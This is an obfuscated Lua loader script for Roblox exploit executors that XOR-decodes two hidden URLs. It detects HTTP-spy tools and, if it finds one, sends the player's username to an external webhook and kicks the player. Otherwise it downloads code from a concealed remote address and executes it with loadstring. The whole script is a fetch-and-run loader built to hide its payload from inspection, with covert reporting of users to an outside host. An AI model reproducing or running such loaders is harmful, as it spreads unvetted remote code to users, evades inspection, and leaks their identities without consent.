local function _0xDE(h, k)
    local s = ""
    for i = 1, #h, 2 do
        local b = tonumber(h:sub(i, i+1), 16)
        s = s .. string.char(bit32.bxor(b, k))
    end
    return s
end

local _0xK = 0xAF
local _AL = _0xDE("C7C9D3D4D0958584CEC4D3CECDD9D087CDD8D18C9D8681889D8FD590929F99989B94D1D4D7D2D9DDDECADFCDCED9D294D0DBDC97DCDEDADEDAD7C9D696DEDCDFD7C9D6C99596D3C9DCDEDADEDAD7C9D6CDDCDFD7C9DBDFCDDCD19BCCDADFCD", _0xK)
local _G = _0xDE("C7C9D3D4D0958584DDCFC286CDC9D7D6D9CBCACCD0CBCACCD9DDCBC3DAD2DCCCD6DBD9D082D9D6D3D5D9DDCAD8DED0D9D9", _0xK)

local _L = game:GetService("Players").LocalPlayer
local _req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request

local function _SC()
    if not _req then return false end
    local ok, info = pcall(debug.getinfo, _req)
    if ok and info and info.source ~= "=[C]" then return true end
    for _, v in ipairs({"HttpSpy", "SimpleSpy", "VGG Spy", "HydroSpy"}) do if getgenv()[v] then return true end end
    return false
end

if _SC() then
    pcall(function()
        _req({
            Url = _AL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = game:GetService("HttpService"):JSONEncode({
                embeds = {{title = "🚨 Security Alert: Interceptor Detected", description = "User " .. _L.Name .. " tried to use HTTP Spy.", color = 16711680}}
            })
        })
    end)
    _L:Kick("Loader Security Error 0xFA")
    return
end

getgenv()._NK_SIGNAL = "NAZARKUS_ULTRA_V8"
local ok, res = pcall(function() return game:HttpGet(_G) end)
if ok and res then
    local f = loadstring(res)
    if f then task.spawn(f) end
else
    _L:Kick("Connection Fail. Try again.")
end
